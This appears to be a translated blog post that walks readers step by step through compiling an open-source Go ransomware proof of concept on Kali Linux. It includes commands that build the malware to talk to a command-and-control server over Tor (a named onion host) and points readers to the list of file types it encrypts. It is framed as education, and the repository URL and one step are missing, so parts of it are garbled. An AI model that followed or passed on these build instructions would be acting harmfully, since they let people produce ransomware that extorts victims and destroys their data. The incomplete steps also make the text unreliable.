Make your own Ransomware

Ransomware is fast becoming the most important form of malware affecting our digital systems. Companies around the world are being hit by various forms of malware, including a new variant, Snake, designed specifically for SCADA/ICS systems.

Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom, demonstrating the risk this ransomware poses to a nation's industrial systems and infrastructure. Recently, the major American insurance company CNA admitted to paying a ransom of 40 million dollars! No wonder ransomware developers are getting more creative and malicious, ransomware pays!



To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on He developed this ransomware as part of his academic program and it is not designed for malicious purposes, but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, the malware is written in Golang.

The malware encrypts files in the background with AES-256-CTR and uses RSA-4096 to secure data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.

Step #1: Download and install them Binaries

The first step is to run Kali and make sure golang is installed. If not, download it from the Kali repositories by entering,

kali > sudo apt install golang

Then you will need to login as root user.

kali > sudo su -


Now create a directory for the binaries. In this case, I simply named it “git”.

kali >mkdir git

Then change directory (cd) to that directory.

kali > cd git

Then download the binaries from

kali > git clones


Step #2: Extract GO variables

Next, we need to set some variables to point the binaries and GO to the appropriate directories.


Step #3: Build the source code dependencies

Now, with the variables set and exported, we need to create the dependencies. Navigate to the new directory, ransomware, and type make deps.

kali > cd ransomware

kali > make deps


Step #4: Build the source code with options

Now that we have completed it deps make, we can start building the source code. In our case, we will use a few options.

First, we want to use ToR to encrypt our communications over the ToR network.


Second, we want to use our server at hackersarisegtdj.onion (you can use any domain or localhost).


Third, we want to use the port 80 (you can use any port).


Finally, we want to set the operating system for the compiles of the source code for our operating system, in this case Linux.



Our command should look something like this,

kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Now press ENTER to create your ransomware.

Step #5: Check the directory for ransomware.exe

Once the source code is generated, make a list in the ransomware directory.

kali > ls -l


Now, navigate to the bin directory.

kali > cd bin


Here, you will see ransomware.exe, server and unlocker.exe.

Step #6: Consider the types of files to encrypt

If you want to see what types of files this ransomware will encrypt, go to the cmd directory and open it common.go

kali > cd cmd

kali > more common.go


Here, you can see the file extensions that this ransomware aims to encrypt when executed.


Ransomware is perhaps the biggest threat to our digital systems right now. As the Colonial Pipeline attack clearly demonstrated, almost everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant financial and infrastructure impacts!

This ransomware POC will help you better understand ransomware as a threat and check if your systems are vulnerable to such an attack.

In the second part of this series, we will test the ransomware on a Windows VM. The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.098 registrants.

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).